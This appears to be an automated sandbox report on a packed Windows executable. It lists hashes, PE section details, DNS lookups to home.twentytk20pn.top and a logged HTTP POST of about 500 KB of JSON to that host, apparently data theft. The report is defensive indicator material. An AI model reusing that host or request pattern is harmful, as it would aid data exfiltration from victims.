                                                    No context
                                                    No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.983831092703381
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: wlEp68Few5.exe
File size: 4'474'880 bytes
MD5: 8cd346fc831e7d59ebab0de045018b84
SHA1: 65ecbe74b5e512c9b00dbb0d041ac1f812f3cbb5
SHA256: ca2b0a34c077e6e81cde2626da1aca4de3f52190747d4f66636a0a8397e158c5
SHA512: 6708a808b9300845e5852f25a380abf1ce807d96695256793c7a80ebc08307f21a6ba38bc0d73c2897c46ad2828f80717ad2f79c585c658324c7b887bf797912
SSDEEP: 98304:HYd0UZJxaPAlwK5/4ZGpF1NfrV/qHFAUrIYkO7lVT7T:HYZJOxK5wZGJNp/gAfYln
TLSH: AF26336C2AB3D58DFBA1683A6FCB1B40682019F2C6E79C516D05EBFF194E51E17C13A0
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@...................................D...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0xf6b000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                    Instruction
                                                    jmp 00007F6F944FF4DAh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61905f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x618000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb697e0 | 0x10 | vwhakcfb
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb69790 | 0x18 | vwhakcfb
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x617000 | 0x283e00 | f2f769665fc7f70670e8bf7d115f0118 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x618000 | 0x2b0 | 0x200 | 40d4917ae009f1cd9a671bc7a1902a98 | False | 0.794921875 | data | 6.050616596482934 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x619000 | 0x1000 | 0x200 | e8fbf92e0939d0cd4935f0fe539e974d | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x61a000 | 0x393000 | 0x200 | d25e1e6caaf3c73497fdc30c7f11d82c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vwhakcfb | 0x9ad000 | 0x1bd000 | 0x1bcc00 | 5938c5912147d610a631d0b6df923be7 | False | 0.9944798693086003 | data | 7.956697617870847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nubvuqgg | 0xb6a000 | 0x1000 | 0x600 | 3d1504aa57dafcafee658e6c78c5d5ae | False | 0.5833333333333334 | data | 5.090714072879632 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xb6b000 | 0x3000 | 0x2200 | 9ccc7ce379b007c8be66e6145462c05c | False | 0.06433823529411764 | DOS executable (COM) | 0.7590613508815471 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xb697f0 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Dec 19, 2024 08:33:33.380438089 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380466938 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380489111 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380492926 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380517960 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380564928 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380582094 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380697012 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380727053 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380764008 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380774975 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380789042 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380825043 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380853891 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380858898 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380877972 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380912066 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.380923033 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.380986929 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381006002 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381064892 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381074905 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381105900 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381133080 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381158113 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381160975 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381186008 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381217003 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381256104 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381257057 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381284952 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381313086 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381319046 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381342888 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381371975 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381375074 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381429911 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381439924 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381508112 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381567955 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381596088 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381625891 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381652117 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381783962 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381814003 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381841898 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381853104 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381871939 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381879091 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381901979 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381913900 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381927013 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381953955 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381958008 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381983995 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.382011890 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.382045031 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.382093906 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.382122993 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.382155895 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.382272005 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.384315968 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.384378910 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.388731956 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.388761044 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.388812065 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.388835907 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.400895119 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.400909901 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.401035070 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.415349960 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.415422916 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.415525913 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.415581942 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.415585995 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.415659904 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.415671110 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.415731907 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.442259073 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.442610025 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.450408936 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.450423956 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.450494051 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.450862885 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.454479933 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.454492092 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.454775095 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.454910994 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.454921007 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.455113888 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.458811045 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.489720106 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492295980 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492466927 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492503881 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492521048 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492625952 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492635965 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492702007 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492712975 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492800951 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492810965 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492959976 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.494817972 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.494885921 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.494894981 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495048046 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495058060 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495122910 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495191097 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495201111 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495285034 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495295048 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495383024 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495485067 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495738029 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495930910 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495959044 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.496023893 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498231888 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498250008 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498297930 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498564959 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498574018 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498615980 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498656988 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498682022 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498804092 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498812914 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498846054 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498905897 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498917103 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498950958 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498960972 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499156952 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499185085 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499212027 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499260902 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499289036 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499357939 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499385118 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499417067 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499545097 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499573946 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499643087 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499718904 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499768972 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499797106 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499845028 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499871969 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500338078 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500483036 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500511885 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500545025 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500641108 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500880003 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500948906 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500977039 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501009941 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501058102 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501240015 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501269102 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501370907 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501518011 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501571894 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501600027 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501646996 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501674891 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501779079 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501806974 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501913071 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501940966 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502047062 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502074957 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502125978 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502177000 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502275944 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502304077 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502336979 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502382994 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502470970 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502497911 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502547026 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502576113 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502700090 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502727032 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502815008 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502940893 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502969027 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503037930 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503065109 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503113985 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503142118 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503169060 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503217936 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503246069 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503305912 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503348112 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503432989 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503460884 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503516912 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503602028 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503643036 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503670931 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503917933 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503946066 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503976107 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504004002 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504055977 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504084110 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504110098 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504162073 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504189014 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504216909 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504265070 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504292011 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504323959 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504422903 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504463911 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504492044 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504523039 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504571915 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504604101 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504631042 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504678965 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504709005 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504813910 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504842043 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504956007 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.505038977 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.505065918 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.505178928 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.505206108 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.508363008 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.508392096 CET8049732194.87.47.113192.168.2.9
DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 08:33:28.023426056 CET | 192.168.2.9 | 1.1.1.1 | 0x689f | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:33:28.023499012 CET | 192.168.2.9 | 1.1.1.1 | 0xee69 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 19, 2024 08:33:31.589251995 CET | 192.168.2.9 | 1.1.1.1 | 0x3e51 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:33:31.589317083 CET | 192.168.2.9 | 1.1.1.1 | 0x6f52 | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 19, 2024 08:33:34.042292118 CET | 192.168.2.9 | 1.1.1.1 | 0x9a1e | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:33:34.042416096 CET | 192.168.2.9 | 1.1.1.1 | 0x89fc | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false

DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 08:33:28.322597027 CET | 1.1.1.1 | 192.168.2.9 | 0x689f | No error (0) | httpbin.org | | 98.85.100.80 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:33:28.322597027 CET | 1.1.1.1 | 192.168.2.9 | 0x689f | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:33:31.998164892 CET | 1.1.1.1 | 192.168.2.9 | 0x3e51 | No error (0) | home.twentytk20pn.top | | 194.87.47.113 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:33:34.179955959 CET | 1.1.1.1 | 192.168.2.9 | 0x9a1e | No error (0) | home.twentytk20pn.top | | 194.87.47.113 | A (IP address) | IN (0x0001) | false
• httpbin.org
• home.twentytk20pn.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49732 | 194.87.47.113 | 80 | 5960 | C:\Users\user\Desktop\wlEp68Few5.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 08:33:32.120551109 CET | 12360 | OUT | POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
Host: home.twentytk20pn.top
Accept: */*
Content-Type: application/json
Content-Length: 501502
